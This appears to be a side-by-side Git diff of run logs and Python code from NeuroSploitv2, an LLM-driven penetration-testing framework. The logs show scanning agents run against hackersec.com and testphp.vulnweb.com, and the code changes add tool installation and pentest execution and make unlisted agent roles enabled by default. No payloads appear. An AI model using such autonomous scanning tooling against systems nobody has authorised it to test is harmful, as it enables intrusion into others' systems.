2025-12-19 12:10:28,397 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_121028 2026-01-09 21:32:28,901 - core.llm_manager - WARNING - Claude API connection error (attempt 3/3): Connection error.
2025-12-19 12:13:17,354 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_121317 2026-01-09 21:32:28,902 - core.llm_manager - ERROR - Error generating raw response: Failed to connect to Claude API after 3 attempts: Connection error.
2025-12-19 12:13:32,185 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_121332 2026-01-09 21:32:29,118 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.421690 seconds
2025-12-19 12:14:31,136 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_121431 2026-01-09 21:32:29,758 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.833663 seconds
2025-12-19 12:14:31,136 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:32:30,821 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.554424 seconds
2025-12-19 12:14:31,137 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:32:32,730 - core.llm_manager - WARNING - Claude API connection error (attempt 1/3): Connection error.
2025-12-19 12:14:31,139 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:32:32,730 - core.llm_manager - INFO - Retrying in 1.0s...
2025-12-19 12:14:31,139 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:32:33,987 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.393485 seconds
2025-12-19 12:14:31,139 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:32:34,599 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.968475 seconds
2025-12-19 12:14:31,139 - agents.base_agent - INFO - Executing owasp_expert agent for input: identifique vulnerabilidades no dominio hackersec.... 2026-01-09 21:32:35,833 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.528886 seconds
2025-12-19 12:14:58,217 - __main__ - INFO - Results saved to results/campaign_20251219_121431.json 2026-01-09 21:32:37,592 - core.llm_manager - WARNING - Claude API connection error (attempt 2/3): Connection error.
2025-12-19 12:14:58,218 - __main__ - INFO - Report generated: reports/report_20251219_121431.html 2026-01-09 21:32:37,592 - core.llm_manager - INFO - Retrying in 2.0s...
2025-12-19 12:15:43,666 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_121543 2026-01-09 21:32:39,823 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.496181 seconds
2025-12-19 12:15:43,667 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:32:40,528 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.836243 seconds
2025-12-19 12:15:43,667 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:32:41,589 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.746444 seconds
2025-12-19 12:15:43,669 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:32:43,570 - core.llm_manager - WARNING - Claude API connection error (attempt 3/3): Connection error.
2025-12-19 12:15:43,670 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:32:43,570 - core.llm_manager - ERROR - Error generating raw response: Failed to connect to Claude API after 3 attempts: Connection error.
2025-12-19 12:15:43,670 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:32:43,571 - __main__ - INFO - Results saved to results/campaign_20260109_213056.json
2025-12-19 12:15:43,670 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan target hackersec.com... 2026-01-09 21:32:43,574 - __main__ - INFO - Report generated: reports/report_20260109_213056.html
2025-12-19 12:16:11,774 - __main__ - INFO - Results saved to results/campaign_20251219_121543.json 2026-01-09 21:40:59,505 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_214059
2025-12-19 12:16:11,775 - __main__ - INFO - Report generated: reports/report_20251219_121543.html 2026-01-09 21:40:59,505 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 12:19:12,710 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_121912 2026-01-09 21:40:59,506 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 12:19:12,710 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:40:59,508 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 12:19:12,711 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:40:59,508 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-sonnet-4-20250514, Profile: claude_opus_default
2025-12-19 12:19:12,713 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:40:59,508 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent
2025-12-19 12:19:12,713 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:43:45,178 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.473436 seconds
2025-12-19 12:19:12,713 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:43:52,346 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.775400 seconds
2025-12-19 12:19:12,713 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan target hackersec.com... 2026-01-09 21:43:59,704 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.551157 seconds
2025-12-19 12:19:55,720 - __main__ - INFO - Results saved to results/campaign_20251219_121912.json 2026-01-09 21:44:10,147 - core.llm_manager - WARNING - Claude API connection error (attempt 1/3): Connection error.
2025-12-19 12:19:55,721 - __main__ - INFO - Report generated: reports/report_20251219_121912.html 2026-01-09 21:44:10,147 - core.llm_manager - INFO - Retrying in 1.0s...
2025-12-19 12:31:03,782 - __main__ - INFO - Created default configuration at config/config.json 2026-01-09 21:44:17,431 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.377721 seconds
2025-12-19 12:31:03,782 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_123103 2026-01-09 21:44:26,639 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.832601 seconds
2025-12-19 12:31:03,783 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:44:36,229 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.559698 seconds
2025-12-19 12:31:03,783 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:44:45,594 - core.llm_manager - WARNING - Claude API connection error (attempt 2/3): Connection error.
2025-12-19 12:31:03,785 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:44:45,595 - core.llm_manager - INFO - Retrying in 2.0s...
2025-12-19 12:31:03,785 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:45:40,601 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_214540
2025-12-19 12:31:03,785 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:45:40,601 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 12:31:03,785 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan target hackersec.com... 2026-01-09 21:45:40,601 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 12:31:23,207 - __main__ - INFO - Results saved to results/campaign_20251219_123103.json 2026-01-09 21:45:40,605 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 12:31:23,208 - __main__ - INFO - Report generated: reports/report_20251219_123103.html 2026-01-09 21:45:40,605 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-sonnet-4-20250514, Profile: claude_opus_default
2025-12-19 12:33:07,023 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_123307 2026-01-09 21:45:40,605 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent
2025-12-19 12:33:07,023 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:48:23,437 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.466073 seconds
2025-12-19 12:33:07,024 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:48:30,784 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.901871 seconds
2025-12-19 12:33:07,026 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:48:39,254 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.891843 seconds
2025-12-19 12:33:07,026 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:48:47,470 - core.llm_manager - WARNING - Claude API connection error (attempt 1/3): Connection error.
2025-12-19 12:33:07,026 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:48:47,470 - core.llm_manager - INFO - Retrying in 1.0s...
2025-12-19 12:33:07,026 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan target http://testphp.vulnweb.com and identif... 2026-01-09 21:48:55,693 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.495814 seconds
2025-12-19 12:33:25,214 - __main__ - INFO - Results saved to results/campaign_20251219_123307.json 2026-01-09 21:49:03,131 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.917409 seconds
2025-12-19 12:33:25,215 - __main__ - INFO - Report generated: reports/report_20251219_123307.html 2026-01-09 21:49:09,718 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.668270 seconds
2025-12-19 12:36:29,020 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_123629 2026-01-09 21:49:17,975 - core.llm_manager - WARNING - Claude API connection error (attempt 2/3): Connection error.
2025-12-19 12:36:29,020 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:49:17,975 - core.llm_manager - INFO - Retrying in 2.0s...
2025-12-19 12:36:29,021 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:49:27,741 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.461509 seconds
2025-12-19 12:36:29,023 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:49:37,420 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.764362 seconds
2025-12-19 12:36:29,023 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:49:46,856 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.681579 seconds
2025-12-19 12:36:29,023 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:49:55,732 - core.llm_manager - WARNING - Claude API connection error (attempt 3/3): Connection error.
2025-12-19 12:36:29,023 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan target hackersec.com... 2026-01-09 21:49:55,732 - core.llm_manager - ERROR - Error generating raw response: Failed to connect to Claude API after 3 attempts: Connection error.
2025-12-19 12:36:45,283 - __main__ - INFO - Results saved to results/campaign_20251219_123629.json 2026-01-09 21:50:12,483 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.391463 seconds
2025-12-19 12:37:01,705 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_123701 2026-01-09 21:50:26,485 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.852497 seconds
2025-12-19 12:37:01,705 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:50:44,334 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.998506 seconds
2025-12-19 12:37:01,705 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:51:01,814 - core.llm_manager - WARNING - Claude API connection error (attempt 1/3): Connection error.
2025-12-19 12:37:01,707 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:51:01,814 - core.llm_manager - INFO - Retrying in 1.0s...
2025-12-19 12:37:01,707 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:51:18,215 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.376669 seconds
2025-12-19 12:37:01,707 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:51:35,478 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.796112 seconds
2025-12-19 12:37:01,707 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan target hackersec.com... 2026-01-09 21:51:53,615 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.699116 seconds
2025-12-19 12:37:16,413 - __main__ - INFO - Results saved to results/campaign_20251219_123701.json 2026-01-09 21:52:05,785 - core.llm_manager - WARNING - Claude API connection error (attempt 2/3): Connection error.
2025-12-19 12:43:25,362 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_124325 2026-01-09 21:52:05,785 - core.llm_manager - INFO - Retrying in 2.0s...
2025-12-19 12:43:25,362 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:52:24,787 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.464746 seconds
2025-12-19 12:43:25,363 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:52:41,245 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.985268 seconds
2025-12-19 12:43:25,365 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:52:58,448 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.620720 seconds
2025-12-19 12:43:25,365 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:53:16,123 - core.llm_manager - WARNING - Claude API connection error (attempt 3/3): Connection error.
2025-12-19 12:43:25,365 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:53:16,123 - core.llm_manager - ERROR - Error generating raw response: Failed to connect to Claude API after 3 attempts: Connection error.
2025-12-19 12:43:25,365 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan target hackersec.com... 2026-01-09 21:53:16,124 - __main__ - INFO - Results saved to results/campaign_20260109_214540.json
2025-12-19 12:43:47,234 - __main__ - INFO - Results saved to results/campaign_20251219_124325.json 2026-01-09 21:53:16,127 - __main__ - INFO - Report generated: reports/report_20260109_214540.html
2025-12-19 12:43:47,235 - __main__ - INFO - Report generated: reports/report_20251219_124325.html 2026-01-09 21:56:06,802 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_215606
2025-12-19 12:46:24,533 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_124624 2026-01-09 21:56:06,802 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 12:51:12,912 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_125112 2026-01-09 21:56:06,803 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 13:07:54,046 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_130754 2026-01-09 21:56:06,804 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 13:08:09,699 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_130809 2026-01-09 21:56:06,805 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-sonnet-4-20250514, Profile: claude_opus_default
2025-12-19 13:08:39,156 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_130839 2026-01-09 21:56:06,805 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent
2025-12-19 13:08:39,156 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:59:35,167 - __main__ - INFO - Results saved to results/campaign_20260109_215606.json
2025-12-19 13:08:39,157 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:59:35,173 - __main__ - INFO - Report generated: reports/report_20260109_215606.html
2025-12-19 13:08:39,160 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 22:01:55,119 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_220155
2025-12-19 13:08:39,160 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 22:01:55,120 - __main__ - INFO - Starting execution for agent role: Pentestfull
2025-12-19 13:08:39,160 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 22:01:55,120 - __main__ - ERROR - Agent role 'Pentestfull' not found in configuration.
2025-12-19 13:08:39,160 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan target hackersec.com... 2026-01-09 22:02:52,978 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_220252
2025-12-19 13:08:59,868 - __main__ - INFO - Results saved to results/campaign_20251219_130839.json 2026-01-09 22:02:52,978 - __main__ - INFO - Starting execution for agent role: Pentestfull
2025-12-19 13:08:59,893 - __main__ - INFO - Report generated: reports/report_20251219_130839.html 2026-01-09 22:02:52,978 - __main__ - ERROR - Agent role 'Pentestfull' not found in configuration.
2025-12-19 13:09:57,106 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_130957 2026-01-09 22:03:51,858 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_220351
2025-12-19 13:10:51,790 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_131051 2026-01-09 22:03:51,858 - __main__ - INFO - Starting execution for agent role: Pentestfull
2025-12-19 13:10:51,790 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter 2026-01-09 22:03:51,858 - __main__ - ERROR - Agent role 'Pentestfull' not found in configuration.
2025-12-19 13:10:51,791 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 22:04:11,723 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_220411
2025-12-19 13:10:51,794 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 22:04:11,723 - __main__ - INFO - Starting execution for agent role: Pentestfull
2025-12-19 13:10:51,794 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 22:04:11,723 - __main__ - ERROR - Agent role 'Pentestfull' not found in configuration.
2025-12-19 13:10:51,794 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent. Description: Focuses on web application vulnerabilities, leveraging recon and exploitation tools. 2026-01-09 22:04:25,438 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_220425
2025-12-19 13:10:51,794 - agents.base_agent - INFO - Executing bug_bounty_hunter agent for input: identify vulnerability in target testphp.vulnweb.c... 2026-01-09 22:04:28,726 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_220428
2025-12-19 13:12:27,308 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_131227 2026-01-09 22:05:50,800 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_220550
2025-12-19 13:12:27,308 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter 2026-01-09 22:05:50,800 - __main__ - INFO - Starting execution for agent role: /opt/NeuroSploitv2/prompts/md_library/Pentestfull.md
2025-12-19 13:12:27,308 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 22:05:50,800 - __main__ - INFO - Agent role '/opt/NeuroSploitv2/prompts/md_library/Pentestfull.md' not in config.json, using dynamic mode with prompt file.
2025-12-19 13:12:27,310 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 22:05:50,800 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 13:12:27,310 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 22:05:50,801 - core.llm_manager - INFO - Loaded 13 prompts from Markdown files.
2025-12-19 13:12:27,310 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent. Description: Focuses on web application vulnerabilities, leveraging recon and exploitation tools. 2026-01-09 22:05:50,801 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-sonnet-4-20250514, Profile: claude_opus_default
2025-12-19 13:12:27,310 - agents.base_agent - INFO - Executing bug_bounty_hunter agent for input: identify vulnerability in target testphp.vulnweb.c... 2026-01-09 22:05:50,801 - __main__ - ERROR - Prompts for agent role '/opt/NeuroSploitv2/prompts/md_library/Pentestfull.md' not found in MD library.
2025-12-19 13:12:41,925 - __main__ - INFO - Results saved to results/campaign_20251219_131227.json 2026-01-09 22:06:02,465 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_220602
2025-12-19 13:12:41,946 - __main__ - INFO - Report generated: reports/report_20251219_131227.html 2026-01-09 22:06:02,465 - __main__ - INFO - Starting execution for agent role: Pentestfull
2025-12-19 13:24:05,659 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_132405 2026-01-09 22:06:02,465 - __main__ - INFO - Agent role 'Pentestfull' not in config.json, using dynamic mode with prompt file.
2025-12-19 13:24:05,659 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter 2026-01-09 22:06:02,465 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 13:24:05,659 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 22:06:02,466 - core.llm_manager - INFO - Loaded 13 prompts from Markdown files.
2025-12-19 13:24:05,661 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 22:06:02,466 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-sonnet-4-20250514, Profile: claude_opus_default
2025-12-19 13:24:05,661 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 22:06:02,466 - agents.base_agent - INFO - Initialized Pentestfull agent
2025-12-19 13:24:05,661 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent. Description: Focuses on web application vulnerabilities, leveraging recon and exploitation tools. 2026-01-09 22:16:20,776 - __main__ - INFO - Results saved to results/campaign_20260109_220602.json
2025-12-19 13:24:05,661 - agents.base_agent - INFO - Executing bug_bounty_hunter agent for input: identify vulnerability in target testphp.vulnweb.c... 2026-01-09 22:16:20,782 - __main__ - INFO - Report generated: reports/report_20260109_220602.html
2025-12-19 13:24:18,057 - __main__ - INFO - Results saved to results/campaign_20251219_132405.json 2026-01-09 22:21:27,009 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_222127
2025-12-19 13:24:18,078 - __main__ - INFO - Report generated: reports/report_20251219_132405.html 2026-01-09 22:21:27,009 - __main__ - INFO - Starting execution for agent role: Pentestfull
2026-01-09 22:21:27,009 - __main__ - INFO - Agent role 'Pentestfull' not in config.json, using dynamic mode with prompt file.
2026-01-09 22:21:27,010 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2026-01-09 22:21:27,013 - core.llm_manager - INFO - Loaded 13 prompts from Markdown files.
2026-01-09 22:21:27,013 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-sonnet-4-20250514, Profile: claude_opus_default
2026-01-09 22:21:27,013 - agents.base_agent - INFO - Initialized Pentestfull agent
2026-01-09 22:25:50,723 - __main__ - INFO - Results saved to results/campaign_20260109_222127.json
2026-01-09 22:25:50,730 - __main__ - INFO - Report generated: reports/report_20260109_222127.html
2026-01-09 22:29:14,140 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_222914
2026-01-09 22:29:14,140 - __main__ - INFO - Starting execution for agent role: Pentestfull
2026-01-09 22:29:14,140 - __main__ - INFO - Agent role 'Pentestfull' not in config.json, using dynamic mode with prompt file.
2026-01-09 22:29:14,141 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2026-01-09 22:29:14,144 - core.llm_manager - INFO - Loaded 13 prompts from Markdown files.
2026-01-09 22:29:14,144 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-sonnet-4-20250514, Profile: claude_opus_default
2026-01-09 22:29:14,144 - agents.base_agent - INFO - Initialized Pentestfull - Autonomous Agent
2026-01-09 22:31:51,657 - __main__ - INFO - Results saved to results/campaign_20260109_222914.json
2026-01-09 22:31:51,665 - __main__ - INFO - Report generated: reports/report_20260109_222914.html

676
neurosploit.py
View File

@@ -10,6 +10,7 @@ import os
import sys import sys
import argparse import argparse
import json import json
import re
from pathlib import Path from pathlib import Path
from typing import Dict, List, Optional from typing import Dict, List, Optional
import logging import logging
@@ -29,12 +30,19 @@ logging.basicConfig(
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
from core.llm_manager import LLMManager from core.llm_manager import LLMManager
from core.tool_installer import ToolInstaller, run_installer_menu, PENTEST_TOOLS
from core.pentest_executor import PentestExecutor
from core.report_generator import ReportGenerator
from agents.base_agent import BaseAgent from agents.base_agent import BaseAgent
class Completer: class Completer:
def __init__(self, neurosploit): def __init__(self, neurosploit):
self.neurosploit = neurosploit self.neurosploit = neurosploit
self.commands = ["help", "run_agent", "config", "list_roles", "list_profiles", "set_profile", "set_agent", "discover_ollama", "exit", "quit"] self.commands = [
"help", "run_agent", "config", "list_roles", "list_profiles",
"set_profile", "set_agent", "discover_ollama", "install_tools",
"scan", "quick_scan", "check_tools", "exit", "quit"
]
self.agent_roles = list(self.neurosploit.config.get('agent_roles', {}).keys()) self.agent_roles = list(self.neurosploit.config.get('agent_roles', {}).keys())
self.llm_profiles = list(self.neurosploit.config.get('llm', {}).get('profiles', {}).keys()) self.llm_profiles = list(self.neurosploit.config.get('llm', {}).get('profiles', {}).keys())
@@ -83,7 +91,10 @@ class NeuroSploitv2:
# LLMManager instance will be created dynamically per agent role to select specific profiles # LLMManager instance will be created dynamically per agent role to select specific profiles
self.llm_manager_instance: Optional[LLMManager] = None self.llm_manager_instance: Optional[LLMManager] = None
self.selected_agent_role: Optional[str] = None self.selected_agent_role: Optional[str] = None
# Initialize tool installer
self.tool_installer = ToolInstaller()
logger.info(f"NeuroSploitv2 initialized - Session: {self.session_id}") logger.info(f"NeuroSploitv2 initialized - Session: {self.session_id}")
def _setup_directories(self): def _setup_directories(self):
@@ -125,11 +136,16 @@ class NeuroSploitv2:
agent_roles_config = self.config.get('agent_roles', {}) agent_roles_config = self.config.get('agent_roles', {})
role_config = agent_roles_config.get(agent_role_name) role_config = agent_roles_config.get(agent_role_name)
# If role not in config, create a default config (allows dynamic roles from .md files)
if not role_config: if not role_config:
logger.error(f"Agent role '{agent_role_name}' not found in configuration.") logger.info(f"Agent role '{agent_role_name}' not in config.json, using dynamic mode with prompt file.")
return {"error": f"Agent role '{agent_role_name}' not found."} role_config = {
"enabled": True,
if not role_config.get('enabled', False): "tools_allowed": [],
"description": f"Dynamic agent role loaded from {agent_role_name}.md"
}
if not role_config.get('enabled', True):
logger.warning(f"Agent role '{agent_role_name}' is disabled in configuration.") logger.warning(f"Agent role '{agent_role_name}' is disabled in configuration.")
return {"warning": f"Agent role '{agent_role_name}' is disabled."} return {"warning": f"Agent role '{agent_role_name}' is disabled."}
@@ -174,94 +190,469 @@ class NeuroSploitv2:
self._generate_report(results) self._generate_report(results)
def _generate_report(self, results: Dict): def _generate_report(self, results: Dict):
"""Generate HTML report for agent role execution""" """Generate professional HTML report with charts and modern CSS"""
report_file = f"reports/report_{self.session_id}.html" report_file = f"reports/report_{self.session_id}.html"
# Get data
llm_response = results.get('results', {}).get('llm_response', '') llm_response = results.get('results', {}).get('llm_response', '')
if isinstance(llm_response, dict): if isinstance(llm_response, dict):
llm_response = json.dumps(llm_response, indent=2) llm_response = json.dumps(llm_response, indent=2)
report_content = mistune.html(llm_response) report_content = mistune.html(llm_response)
html = f""" # Extract metrics from report
<!DOCTYPE html> targets = results.get('results', {}).get('targets', [results.get('input', 'N/A')])
<html lang="en"> if isinstance(targets, str):
<head> targets = [targets]
<meta charset="UTF-8"> tools_executed = results.get('results', {}).get('tools_executed', 0)
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>NeuroSploitv2 Report - {results['session_id']}</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/atom-one-dark.min.css">
<style>
body {{
background-color: #121212;
color: #e0e0e0;
}}
.card {{
background-color: #1e1e1e;
border: 1px solid #333;
}}
.card-header {{
background-color: #333;
color: #00ff00;
font-weight: bold;
}}
pre {{
white-space: pre-wrap;
word-wrap: break-word;
}}
.logo {{
font-size: 2rem;
font-weight: bold;
color: #00ff00;
text-shadow: 0 0 10px #00ff00;
}}
.report-content h2 {{
border-bottom: 2px solid #00ff00;
padding-bottom: 10px;
margin-top: 30px;
}}
</style>
</head>
<body>
<div class="container mt-5">
<div class="d-flex justify-content-between align-items-center mb-4">
<h1 class="logo">NeuroSploitv2</h1>
<span class="text-muted">Report ID: {results['session_id']}</span>
</div>
<div class="card mb-4"> # Count severities from report text
